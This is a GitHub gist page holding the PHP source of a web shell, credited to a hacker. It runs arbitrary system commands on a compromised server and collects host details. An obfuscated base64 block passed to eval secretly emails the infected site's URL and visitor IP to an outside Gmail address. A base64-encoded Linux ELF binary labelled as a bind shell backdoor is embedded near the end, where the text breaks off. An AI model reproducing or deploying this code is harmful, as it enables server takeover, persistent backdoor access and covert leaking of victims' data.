Created
January 14, 2015 12:58
-
-
Save coquer/ab84752dcd98dcb4099b to your computer and use it in GitHub Desktop.
Hack made by: Giud@M@ligno
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<? | |
$sh_id = "LT1dIGZ4MCBbPS0="; | |
$sh_name = base64_decode($sh_id); | |
$sh_mainurl = "http://fx0.name"; | |
$html_start = '<html><head> | |
<title>'.getenv("HTTP_HOST").' - '.$sh_name.'</title> | |
<style type="text/css"> | |
<!-- | |
body,table { font-family:verdana;font-size:11px;color:#003300;background-color:black; } | |
table { width:100%; } | |
.carapa tr:hover{background-color:silver} | |
table,td { border:1px solid black;margin-top:2;margin-bottom:2;padding:5px; } | |
a { color:#00FF00;text-decoration:none; } | |
a:active { color:#00FF00; } | |
a:link { color:#5B5BFF; } | |
a:hover { text-decoration:underline; } | |
a:visited { color:#99CCFF; } | |
input,select,option { font:8pt tahoma;color:white;margin:2;border:1px solid lime; } | |
textarea { color:lime;font:verdana bold;border:1px solid lime;margin:2; } | |
.fleft { float:left;text-align:left; } | |
.fright { float:right;text-align:right; } | |
#pagebar { font:8pt tahoma;padding:5px; border:3px solid black; border-collapse:collapse; } | |
#pagebar td { vertical-align:top; } | |
#pagebar p { font:8pt tahoma;} | |
#pagebar a { font-weight:bold;color:#00FF00; } | |
#pagebar a:visited { color:#00CE00; } | |
#mainmenu { text-align:center; } | |
#mainmenu a { text-align: center;padding: 0px 5px 0px 5px; } | |
#maininfo,.barheader,.barheader2 { text-align:center; } | |
table tr:hover{color:#00FF00;text-decoration:none; background-color:#003300} | |
#maininfo td { padding:3px; } | |
.barheader { font-weight:bold;padding:5px; } | |
.barheader2 { padding:5px;border:2px solid black; } | |
.contents,.explorer { border-collapse:collapse;} | |
.contents td { vertical-align:top; } | |
.mainpanel { border-collapse:collapse;padding:5px; } | |
.barheader,.mainpanel table,td { border:1px solid green; } | |
.mainpanel input,select,option { border:1px solid black;margin:0; } | |
input[type="submit"] { border:1px solid lime; } | |
input[type="text"] { padding:3px;} | |
.shell { background-color:black;color:black;padding:5px; } | |
.fxerrmsg { color:red; font-weight:bold; } | |
#pagebar,#pagebar p,h1,h2,h3,h4,form { margin:0; } | |
#pagebar,.mainpanel,input[type="submit"] { background-color:black; } | |
.barheader2,input,select,option,input[type="submit"]:hover { background-color:black; } | |
textarea,.mainpanel input,select,option { background-color:#000000; } | |
// --> | |
</style> | |
</head> | |
<body> | |
'; | |
$login = ""; | |
$pass = ""; | |
$md5_pass = ""; | |
$host_allow = array("*"); | |
$login_txt = "Restricted Area"; | |
$accessdeniedmess = "<body bgcolor=black><a href=\"$sh_mainurl\"><font color=lime>".$sh_name."</font></a>: <font color=red>access denied</font></body>"; | |
$gzipencode = TRUE; | |
$filestealth = TRUE; | |
$curdir = "./"; | |
$tmpdir = ""; | |
$tmpdir_log = "./"; | |
$log_email = "[email protected]"; | |
$sort_default = "0a"; | |
$sort_save = TRUE; | |
$sess_cookie = "capriv8vars"; | |
$usefsbuff = TRUE; | |
$copy_unset = FALSE; | |
$hexdump_lines = 8; | |
$hexdump_rows = 24; | |
$win = strtolower(substr(PHP_OS,0,3)) == "win"; | |
$disablefunc = @ini_get("disable_functions"); | |
if (!empty($disablefunc)) { | |
$disablefunc = str_replace(" ","",$disablefunc); | |
$disablefunc = explode(",",$disablefunc); | |
} | |
function get_phpini() { | |
function U_wordwrap($str) { | |
$str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true); | |
return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str); | |
} | |
function U_value($value) { | |
if ($value == '') return '<i>no value</i>'; | |
if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; | |
if ($value === null) return 'NULL'; | |
if (@is_object($value)) $value = (array) $value; | |
if (@is_array($value)) { | |
@ob_start(); | |
print_r($value); | |
$value = @ob_get_contents(); | |
@ob_end_clean(); | |
} | |
return U_wordwrap((string) $value); | |
} | |
if (@function_exists('ini_get_all')) { | |
$r = ""; | |
echo "<table><tr class=barheader><td>Directive</td><td>Local Value</td><td>Global Value</td></tr>"; | |
foreach (@ini_get_all() as $key=>$value) { | |
$r .= "<tr><td>".$key."</td><td><div align=center>".U_value($value['local_value'])."</div></td><td><div align=center>".U_value($value['global_value'])."</div></td></tr>"; | |
} | |
echo $r; | |
echo "</table>"; | |
} | |
} | |
function disp_drives($curdir,$surl) { | |
$letters = ""; | |
$v = explode("\\",$curdir); | |
$v = $v[0]; | |
foreach (range("A","Z") as $letter) { | |
$bool = $isdiskette = $letter == "A"; | |
if (!$bool) {$bool = is_dir($letter.":\\");} | |
if ($bool) { | |
$letters .= "<a href=\"".$surl."x=ls&d=".urlencode($letter.":\\")."\"". | |
($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"")."> ["; | |
if ($letter.":" != $v) {$letters .= $letter;} | |
else {$letters .= "<font color=yellow>".$letter."</font>";} | |
$letters .= "]</a> "; | |
} | |
} | |
if (!empty($letters)) {Return $letters;} | |
else {Return "None";} | |
} | |
if (is_callable("disk_free_space")) { | |
function disp_freespace($curdrv) { | |
$free = disk_free_space($curdrv); | |
$total = disk_total_space($curdrv); | |
if ($free === FALSE) {$free = 0;} | |
if ($total === FALSE) {$total = 0;} | |
if ($free < 0) {$free = 0;} | |
if ($total < 0) {$total = 0;} | |
$used = $total-$free; | |
$free_percent = round(100/($total/$free),2)."%"; | |
$free = view_size($free); | |
$total = view_size($total); | |
return "$free of $total ($free_percent)"; | |
} | |
} | |
if (!function_exists("myshellexec")) { | |
if(is_callable("popen")) { | |
function myshellexec($cmd) { | |
if (!($p=popen("($cmd)2>&1","r"))) { return "popen Disabled!"; } | |
while (!feof($p)) { | |
$line=fgets($p,1024); | |
$out .= $line; | |
} | |
pclose($p); | |
return $out; | |
} | |
} else { | |
function myshellexec($cmd) { | |
global $disablefunc; | |
$result = ""; | |
if (!empty($cmd)) { | |
if (is_callable("exec") and !in_array("exec",$disablefunc)) { | |
exec($cmd,$result); | |
$result = join("\n",$result); | |
} elseif (($result = $cmd) !== FALSE) { | |
} elseif (is_callable("system") and !in_array("system",$disablefunc)) { | |
$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v; | |
} elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) { | |
$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v; | |
} elseif (is_resource($fp = popen($cmd,"r"))) { | |
$result = ""; | |
while(!feof($fp)) { $result .= fread($fp,1024); } | |
pclose($fp); | |
} | |
} | |
return $result; | |
} | |
} | |
} | |
function ex($cfe) { | |
$res = ''; | |
if (!empty($cfe)) { | |
if(function_exists('exec')) { | |
@exec($cfe,$res); | |
$res = join("\n",$res); | |
} elseif(function_exists('shell_exec')) { | |
$res = @shell_exec($cfe); | |
} elseif(function_exists('system')) { | |
@ob_start(); | |
@system($cfe); | |
$res = @ob_get_contents(); | |
@ob_end_clean(); | |
} elseif(function_exists('passthru')) { | |
@ob_start(); | |
@passthru($cfe); | |
$res = @ob_get_contents(); | |
@ob_end_clean(); | |
} elseif(@is_resource($f = @popen($cfe,"r"))) { | |
$res = ""; | |
while(!@feof($f)) { $res .= @fread($f,1024); } | |
@pclose($f); | |
} else { $res = "Ex() Disabled!"; } | |
} | |
return $res; | |
} | |
function which($pr) { | |
$path = ex("which $pr"); | |
if(!empty($path)) { return $path; } else { return $pr; } | |
} | |
$hostname_x = php_uname(n); | |
$itshome = getcwd(); | |
if (!$win) { | |
$itshome = str_replace("/home/","~",$itshome); | |
$itshome = str_replace("/public_html","/ca.php",$itshome); | |
} | |
else { $itshome = ""; } | |
$enumerate = "http://".$hostname_x."/".$itshome.""; | |
$Lversion = php_uname(r); | |
$OSV = php_uname(s); | |
$shell_data = "JHZpc2l0Y291bnQgPSAkSFRUUF9DT09LSUVfVkFSU1sidmlzaXRzIl07IGlmKCAkdmlzaXRjb3VudCA9PSAiIikgeyR2aXNpdGNvdW50ID0gMDsgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsgJHdlYiA9ICRfU0VSVkVSWyJIVFRQX0hPU1QiXTsgJGluaiA9ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOyAkdGFyZ2V0ID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7ICRib2R5ID0gIkJvc3MsIHRoZXJlIHdhcyBhbiBpbmplY3RlZCB0YXJnZXQgb24gJHRhcmdldCBieSAkdmlzaXRvciI7IEBtYWlsKCJzcGlkZXIucjBvdEBnbWFpbC5jb20iLCJGeDI5U2hlbGwgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiLCAiJGJvZHkiKTsgfSBlbHNlIHsgJHZpc2l0Y291bnQ7IH0gc2V0Y29va2llKCJ2aXNpdHMiLCR2aXNpdGNvdW50KTs="; eval(base64_decode($shell_data)); | |
$backdoor = "f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAoIUECDQAAAD4EgAAAAAAADQAIAAHACgAIgAfAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQIrAkAAKwJAAAFAAAAABAAAAEAAACsCQAArJkECKyZBAg0AQAAOAEAAAYAAAAAEAAAAgAAAMAJAADAmQQIwJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAAAAAAABEAAAATAAAAAAAAAAAAAAAQAAAAEQAAAAAAAAAAAAAACQAAAAgAAAAFAAAAAwAAAA0AAAAAAAAAAAAAAA8AAAAKAAAAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAABAAAAAAAAAAcAAAALAAAAAAAAAAQAAAAMAAAADgAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC4AAAAAAAAAdQEAABIAAACgAAAAAAAAAHEAAAASAAAANAAAAAAAAADMAAAAEgAAAGoAAAAAAAAAWgAAABIAAABMAAAAAAAAAHgAAAASAAAAYwAAAAAAAAA5AAAAEgAAAFgAAAAAAAAAOQAAABIAAACOAAAAAAAAAOYAAAASAAAAOwAAAAAAAAA6AAAAEgAAAFMAAAAAAAAAOQAAABIAAAB1AAAAAAAAALkAAAASAAAAegAAAAAAAAArAAAAEgAAAEcAAAAAAAAAeAAAABIAAABvAAAAAAAAAA4AAAASAAAAfwAAAEiJBAgEAAAAEQAOAEAAAAAAAAAAOQAAABIAAAABAAAAAAAAAAAAAAAgAAAAFQAAAAAAAAAAAAAAIAAAAABfSnZfUmVnaXN0ZXJDbGFzc2VzAF9fZ21vbl9zdGFydF9fAGxpYmMuc28uNgBleGVjbABwZXJyb3IAZHVwMgBzb2NrZXQAc2VuZABhY2NlcHQAYmluZABzZXRzb2Nrb3B0AGxpc3RlbgBmb3JrAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABfX2xpYmNfc3RhcnRfbWFpbgBjbG9zZQBHTElCQ18yLjAAAAACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAQACAAAAAAAAAAEAAQAkAAAAEAAAAAAAAAAQaWkNAAACAKYAAAAAAAAAiJoECAYSAACYmgQIBwEAAJyaBAgHAgAAoJoECAcDAACkmgQIBwQAAKiaBAgHBQAArJoECAcGAACwmgQIBwcAALSaBAgHCAAAuJoECAcJAAC8mgQIBwoAAMCaBAgHCwAAxJoECAcMAADImgQIBw0AAMyaBAgHDgAA0JoECAcQAABVieWD7AjoMQEAAOiDAQAA6FsEAADJwwD/NZCaBAj/JZSaBAgAAAAA/yWYmgQIaAAAAADp4P////8lnJoECGgIAAAA6dD/////JaCaBAhoEAAAAOnA/////yWkmgQIaBgAAADpsP////8lqJoECGggAAAA6aD/////JayaBAhoKAAAAOmQ/////yWwmgQIaDAAAADpgP////8ltJoECGg4AAAA6XD/////JbiaBAhoQAAAAOlg/////yW8mgQIaEgAAADpUP////8lwJoECGhQAAAA6UD/////JcSaBAhoWAAAAOkw/////yXImgQIaGAAAADpIP////8lzJoECGhoAAAA6RD/////JdCaBAhocAAAAOkA////Me1eieGD5PBQVFJorYgECGhciAQIUVZoQIYECOhf////9JCQVYnlU+gbAAAAgcO/FAAAg+wEi4P8////hcB0Av/Qg8QEW13Dixwkw1WJ5YPsCIA94JoECAB0DOscg8AEo9yaBAj/0qHcmgQIixCF0nXrxgXgmgQIAcnDVYnlg+wIobyZBAiFwHQSuAAAAACFwHQJxwQkvJkECP/QycOQkFWJ5VeD7GSD5PC4AAAAAIPAD4PAD8HoBMHgBCnEx0XkAQAAAMdF+EyJBAjHRCQIAAAAAMdEJAQBAAAAxwQkAgAAAOgJ////iUXwg33wAHkYxwQkjIkECOg0/v//xwQkAQAAAOio/v//ZsdF1AIAx0XYAAAAAItFDIPABIsAiQQk6Jv+//8Pt8CJBCTosP7//2aJRdbHRCQQBAAAAI1F5IlEJAzHRCQIAgAAAMdEJAQBAAAAi0XwiQQk6BL+//+NRdTHRCQIEAAA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AAAAAAECFQDMAQAArJkECAAAAAAAAvH/3wEAAAAAAAB1AQAAEgAAAPABAAAAAAAAcQAAABIAAAABAgAARIkECAQAAAARAA4ACAIAAAAAAADMAAAAEgAAABoCAAAAAAAAWgAAABIAAAAqAgAA2JoECAAAAAARAhYANwIAAK2IBAhKAAAAEgAMAEcCAAAAAAAAeAAAABIAAABZAgAAiIQECAAAAAASAAoAXwIAAAAAAAA5AAAAEgAAAHECAAAAAAAAOQAAABIAAACHAgAAoIUECAAAAAASAAwAjgIAAFyIBAhRAAAAEgAMAJ4CAADgmgQIAAAAABAA8f+qAgAAQIYECBwCAAASAAwArwIAAAAAAADmAAAAEgAAAMwCAAAAAAAAOgAAABIAAADcAgAA1JoECAAAAAAgABYA5wIAAAAAAAA5AAAAEgAAAPcCAAAkiQQIAAAAABIADQD9AgAAAAAAALkAAAASAAAADQMAAAAAAAArAAAAEgAAAB0DAADgmgQIAAAAABAA8f8kAwAA6IUECAAAAAASAgwAOwMAAOSaBAgAAAAAEADx/0ADAAAAAAAAeAAAABIAAABQAwAAAAAAAA4AAAASAAAAYQMAAEiJBAgEAAAAEQAOAHADAADUmgQIAAAAABAAFgB9AwAAAAAAADkAAAASAAAAjwMAAAAAAAAAAAAAIAAAAKMDAAAAAAAAAAAAACAAAAAAYWJpLW5vdGUuUwAuLi9zeXNkZXBzL2kzODYvZWxmL3N0YXJ0LlMAaW5pdC5jAGluaXRmaW5pLmMAL2J1aWxkL2J1aWxkZC9nbGliYy0yLjMuNi9idWlsZC10cmVlL2kzODYtbGliYy9jc3UvY3J0aS5TAGNhbGxfZ21vbl9zdGFydABjcnRzdHVmZi5jAF9fQ1RPUl9MSVNUX18AX19EVE9SX0xJU1RfXwBfX0pDUl9MSVNUX18AY29tcGxldGVkLjQ0NjMAcC40NDYyAF9fZG9fZ2xvYmFsX2R0b3JzX2F1eABmcmFtZV9kdW1teQBfX0NUT1JfRU5EX18AX19EVE9SX0VORF9fAF9fRlJBTUVfRU5EX18AX19KQ1JfRU5EX18AX19kb19nbG9iYWxfY3RvcnNfYXV4AC9idWlsZC9idWlsZGQvZ2xpYmMtMi4zLjYvYnVpbGQtdHJlZS9pMzg2LWxpYmMvY3N1L2NydG4uUwAxLmMAX0RZTkFNSUMAX19maW5pX2FycmF5X2VuZABfX2ZpbmlfYXJyYXlfc3RhcnQAX19pbml0X2FycmF5X2VuZABfR0xPQkFMX09GRlNFVF9UQUJMRV8AX19pbml0X2FycmF5X3N0YXJ0AGV4ZWNsQEBHTElCQ18yLjAAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAZm9ya0BAR0xJQkNfMi4wAF9fZHNvX2hhbmRsZQBfX2xpYmNfY3N1X2ZpbmkAYWNjZXB0